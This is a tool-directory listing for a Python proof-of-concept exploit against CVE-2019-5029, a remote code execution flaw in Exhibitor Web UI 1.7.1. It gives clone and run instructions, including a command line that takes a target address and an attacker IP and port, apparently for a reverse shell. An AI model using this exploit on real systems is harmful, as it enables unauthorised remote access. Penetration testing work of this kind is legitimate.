Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-5029 — This is a Python script PoC for CVE-2019-5029 | Kitploit
Tools/GitHubGitHub/yzee00/cve-2019-5029
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubyzee00/cve-2019-5029

CVE-2019-5029

This is a Python script PoC for CVE-2019-5029

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-5029

This is a Python script PoC for CVE-2019-5029. It is a RCE for Exhibitor Web UI 1.7.1.

How to use

Clone this repo git clone https://github.com/yZ1337/CVE-2019-5029.git

Execute as follows python3 CVE-2019-5029.py <TARGET_IP> <TARGET_PORT> <ATTACKER_IP> <ATTACKER_PORT>

Make sure the request inside the script is the same as the request of the Config.

Download Tool